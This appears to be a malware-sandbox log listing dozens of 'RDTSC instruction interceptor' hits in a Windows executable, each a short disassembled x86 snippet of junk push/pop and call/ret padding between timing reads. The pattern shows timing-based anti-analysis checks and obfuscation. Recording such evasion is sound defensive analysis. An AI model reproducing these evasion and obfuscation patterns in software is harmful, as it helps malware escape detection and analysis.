Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C3C4C2 second address: C3C4E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F6F951A9EC7h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C4140D second address: C41413 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C41413 second address: C41417 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C41746 second address: C4174C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C41A4C second address: C41A71 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F6F951A9EB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F6F951A9EC6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C42149 second address: C4214F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C4214F second address: C42154 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C42221 second address: C42228 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C42228 second address: C4223B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnp 00007F6F951A9EB8h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C43466 second address: C434A2 instructions: 0x00000000 rdtsc 0x00000002 js 00007F6F946E7E38h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov edi, dword ptr [ebp+122D188Ah] 0x00000013 push 00000000h 0x00000015 mov dword ptr [ebp+122D27E5h], edx 0x0000001b push 00000000h 0x0000001d sbb edi, 6CBAE1B4h 0x00000023 push eax 0x00000024 pushad 0x00000025 push eax 0x00000026 pushad 0x00000027 popad 0x00000028 pop eax 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F6F946E7E41h 0x00000030 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C432F8 second address: C43302 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F6F951A9EBCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C43302 second address: C43317 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jne 00007F6F946E7E3Ch 0x0000000f rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C43317 second address: C4331C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C4512D second address: C4513D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pushad 0x00000008 jnl 00007F6F946E7E36h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C44E7C second address: C44E82 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C44E82 second address: C44E95 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jnl 00007F6F946E7E36h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C46542 second address: C4659D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F951A9EC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a js 00007F6F951A9EBCh 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 pop eax 0x00000015 popad 0x00000016 nop 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push ebp 0x0000001c call 00007F6F951A9EB8h 0x00000021 pop ebp 0x00000022 mov dword ptr [esp+04h], ebp 0x00000026 add dword ptr [esp+04h], 0000001Ah 0x0000002e inc ebp 0x0000002f push ebp 0x00000030 ret 0x00000031 pop ebp 0x00000032 ret 0x00000033 push 00000000h 0x00000035 mov si, ax 0x00000038 xchg eax, ebx 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e popad 0x0000003f rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C44E95 second address: C44E9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C4659D second address: C465AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F951A9EBDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C465AE second address: C465D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F946E7E48h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C465D1 second address: C465D7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C47071 second address: C47075 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C4B4CB second address: C4B4D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C4834F second address: C48368 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F6F946E7E3Eh 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C48368 second address: C48371 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C4CA14 second address: C4CA25 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F946E7E3Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C48371 second address: C48375 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C4CA25 second address: C4CA9C instructions: 0x00000000 rdtsc 0x00000002 jno 00007F6F946E7E3Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d jmp 00007F6F946E7E3Ch 0x00000012 add ebx, dword ptr [ebp+122D2917h] 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push eax 0x0000001d call 00007F6F946E7E38h 0x00000022 pop eax 0x00000023 mov dword ptr [esp+04h], eax 0x00000027 add dword ptr [esp+04h], 00000016h 0x0000002f inc eax 0x00000030 push eax 0x00000031 ret 0x00000032 pop eax 0x00000033 ret 0x00000034 mov dword ptr [ebp+12477A90h], esi 0x0000003a push 00000000h 0x0000003c push 00000000h 0x0000003e push ecx 0x0000003f call 00007F6F946E7E38h 0x00000044 pop ecx 0x00000045 mov dword ptr [esp+04h], ecx 0x00000049 add dword ptr [esp+04h], 0000001Dh 0x00000051 inc ecx 0x00000052 push ecx 0x00000053 ret 0x00000054 pop ecx 0x00000055 ret 0x00000056 push eax 0x00000057 push edx 0x00000058 push ecx 0x00000059 push eax 0x0000005a push edx 0x0000005b rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C4BBEE second address: C4BBF3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C4D98D second address: C4D991 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C50C57 second address: C50C6D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F951A9EC0h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C522CD second address: C522D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edx 0x00000007 pop edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C522D7 second address: C522E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F951A9EBAh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C52AAC second address: C52AB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C54805 second address: C54809 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C54AA6 second address: C54AAC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C54AAC second address: C54AC7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F951A9EC1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C569E6 second address: C569F3 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F6F946E7E36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C55ABF second address: C55B59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 and edi, dword ptr [ebp+122D3751h] 0x0000000f push dword ptr fs:[00000000h] 0x00000016 cld 0x00000017 mov edi, 0AA7FEBCh 0x0000001c mov dword ptr fs:[00000000h], esp 0x00000023 and edi, dword ptr [ebp+122D3759h] 0x00000029 mov eax, dword ptr [ebp+122D0845h] 0x0000002f push 00000000h 0x00000031 push ebp 0x00000032 call 00007F6F951A9EB8h 0x00000037 pop ebp 0x00000038 mov dword ptr [esp+04h], ebp 0x0000003c add dword ptr [esp+04h], 00000018h 0x00000044 inc ebp 0x00000045 push ebp 0x00000046 ret 0x00000047 pop ebp 0x00000048 ret 0x00000049 push FFFFFFFFh 0x0000004b push 00000000h 0x0000004d push ebx 0x0000004e call 00007F6F951A9EB8h 0x00000053 pop ebx 0x00000054 mov dword ptr [esp+04h], ebx 0x00000058 add dword ptr [esp+04h], 0000001Bh 0x00000060 inc ebx 0x00000061 push ebx 0x00000062 ret 0x00000063 pop ebx 0x00000064 ret 0x00000065 nop 0x00000066 jmp 00007F6F951A9EC6h 0x0000006b push eax 0x0000006c push eax 0x0000006d push edx 0x0000006e ja 00007F6F951A9EBCh 0x00000074 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C55B59 second address: C55B5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C58A53 second address: C58ADB instructions: 0x00000000 rdtsc 0x00000002 jng 00007F6F951A9EB8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push edx 0x00000010 call 00007F6F951A9EB8h 0x00000015 pop edx 0x00000016 mov dword ptr [esp+04h], edx 0x0000001a add dword ptr [esp+04h], 00000019h 0x00000022 inc edx 0x00000023 push edx 0x00000024 ret 0x00000025 pop edx 0x00000026 ret 0x00000027 jmp 00007F6F951A9EC9h 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push ecx 0x00000031 call 00007F6F951A9EB8h 0x00000036 pop ecx 0x00000037 mov dword ptr [esp+04h], ecx 0x0000003b add dword ptr [esp+04h], 00000019h 0x00000043 inc ecx 0x00000044 push ecx 0x00000045 ret 0x00000046 pop ecx 0x00000047 ret 0x00000048 push 00000000h 0x0000004a cld 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f jmp 00007F6F951A9EC5h 0x00000054 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C58ADB second address: C58ADF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C5CDDA second address: C5CDDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C5CDDE second address: C5CDF7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F946E7E3Fh 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C5CDF7 second address: C5CDFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C5CDFD second address: C5CE01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C5CE01 second address: C5CE07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C5CE07 second address: C5CE35 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F6F946E7E4Fh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d ja 00007F6F946E7E36h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C5CE35 second address: C5CE3F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C59CBB second address: C59CDC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007F6F946E7E43h 0x0000000f push eax 0x00000010 push edx 0x00000011 push edi 0x00000012 pop edi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C5D48D second address: C5D52D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jmp 00007F6F951A9EBDh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], eax 0x00000010 clc 0x00000011 mov edi, dword ptr [ebp+122D19C9h] 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push ebx 0x0000001c call 00007F6F951A9EB8h 0x00000021 pop ebx 0x00000022 mov dword ptr [esp+04h], ebx 0x00000026 add dword ptr [esp+04h], 00000019h 0x0000002e inc ebx 0x0000002f push ebx 0x00000030 ret 0x00000031 pop ebx 0x00000032 ret 0x00000033 mov dword ptr [ebp+122D1C8Ah], ebx 0x00000039 push 00000000h 0x0000003b push 00000000h 0x0000003d push ecx 0x0000003e call 00007F6F951A9EB8h 0x00000043 pop ecx 0x00000044 mov dword ptr [esp+04h], ecx 0x00000048 add dword ptr [esp+04h], 0000001Dh 0x00000050 inc ecx 0x00000051 push ecx 0x00000052 ret 0x00000053 pop ecx 0x00000054 ret 0x00000055 jmp 00007F6F951A9EC0h 0x0000005a adc bl, 00000074h 0x0000005d xchg eax, esi 0x0000005e jmp 00007F6F951A9EC8h 0x00000063 push eax 0x00000064 pushad 0x00000065 push ecx 0x00000066 push eax 0x00000067 push edx 0x00000068 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C5D52D second address: C5D536 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C56C3E second address: C56C4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jg 00007F6F951A9EB6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C56C4E second address: C56C54 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C5E757 second address: C5E75B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C61827 second address: C6182D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C66EB8 second address: C66ECB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F6F951A9EB6h 0x0000000a popad 0x0000000b push edx 0x0000000c je 00007F6F951A9EB6h 0x00000012 pop edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C66ECB second address: C66ED1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C66ED1 second address: C66ED7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C6BADF second address: C6BAE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C6BAE8 second address: C6BB16 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F951A9EC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr [eax] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F6F951A9EBCh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C7035C second address: C70362 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C70362 second address: C70378 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F951A9EC2h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C70378 second address: C70387 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jns 00007F6F946E7E36h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C70C2D second address: C70C5D instructions: 0x00000000 rdtsc 0x00000002 ja 00007F6F951A9EB6h 0x00000008 jmp 00007F6F951A9EC7h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F6F951A9EBDh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C70C5D second address: C70C61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C70C61 second address: C70C6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F6F951A9EB6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C70C6D second address: C70C73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C70C73 second address: C70C77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C70C77 second address: C70C7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C70DE3 second address: C70DF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop ecx 0x00000008 pushad 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C70DF1 second address: C70E0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6F946E7E45h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C710DB second address: C710F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F951A9EBEh 0x00000007 jng 00007F6F951A9EB6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C710F7 second address: C710FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C714ED second address: C714F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: BF6A67 second address: BF6A6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C7E80F second address: C7E813 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C7E813 second address: C7E82F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F6F946E7E42h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C7D320 second address: C7D348 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6F951A9EBBh 0x00000009 jmp 00007F6F951A9EC9h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C7D4B2 second address: C7D4B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C7D5E9 second address: C7D5FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6F951A9EBBh 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C7D77A second address: C7D786 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F6F946E7E36h 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C7DF5C second address: C7DF66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F6F951A9EB6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C7DF66 second address: C7DF80 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F6F946E7E36h 0x00000008 jmp 00007F6F946E7E40h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
